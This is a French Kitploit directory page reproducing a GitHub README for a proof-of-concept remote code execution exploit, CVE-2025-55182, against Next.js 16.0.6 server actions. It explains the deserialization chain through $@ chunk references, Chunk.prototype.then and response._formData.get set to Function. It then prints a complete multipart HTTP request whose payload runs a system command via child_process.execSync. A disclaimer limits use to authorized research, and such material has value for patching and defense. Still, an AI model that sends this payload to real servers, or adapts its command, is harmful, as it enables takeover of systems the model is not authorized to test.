Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-RCE-Exploit — Plus axé sur l'exploitation ; idéal pour les dépôts de recherche en sécurité. | Kitploit
Outils/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebArticles et RechercheApprentissage et ÉducationDéveloppement de Charges Utiles
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

Plus axé sur l'exploitation ; idéal pour les dépôts de recherche en sécurité.

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC pour CVE-2025-55182 – Exécution de code à distance dans Next.js 16.0.6

Ce dépôt contient une preuve de concept (POC) fonctionnelle pour CVE-2025-55182, une vulnérabilité critique de désérialisation affectant Next.js 16.0.6. L'exploit abuse de la désérialisation de chunks $@ et de Chunk.prototype.then pour prendre le contrôle total du processus de résolution de chunks et parvenir à une exécution de code arbitraire (RCE) sur le serveur.

Résumé de la vulnérabilité

Next.js utilise des objets Chunk internes et un mécanisme de streaming/désérialisation pour les actions serveur. En abusant de $@ pour désérialiser une référence de chunk et en injectant Chunk.prototype.then dans l'objet racine, un attaquant peut :

  • Forcer Next.js à appeler then(...) avec un contrôlé par l'attaquant
this
  • Définir le status du chunk à resolved_model
  • Déclencher initializeModelChunk avec un faux chunk entièrement contrôlé par l'attaquant
  • Abuser des méthodes chunk._response pour atteindre un comportement interne dangereux
  • Le but final est de déclencher une désérialisation de Blob, qui exécute un appel comme :

    root@kitploit:~
    response._formData.get(response._prefix)
    

    En définissant response._formData.get = Function et en mettant du code arbitraire dans response._prefix, l'attaquant peut exécuter des commandes système arbitraires.

    Preuve de concept de l'exploit

    La requête HTTP dans poc/CVE-2025-55182.http démontre l'exploit contre Next.js 16.0.6 tournant localement, lançant xcalc via child_process.execSync :

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Next-Action: x
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Length: 459
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    

    Structure du dépôt

    root@kitploit:~
    /
    ├── README.md
    ├── DISCLAIMER.md
    ├── poc/
    │   └── CVE-2025-55182.http
    └── analysis/
        └── exploitation-notes.md
    

    Avertissement

    Ce projet est fourni uniquement à des fins éducatives et de recherche. N'utilisez PAS cet exploit sur un système que vous ne possédez pas ou pour lequel vous n'avez pas d'autorisation écrite explicite de tester.

    L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés.

    Télécharger l’outil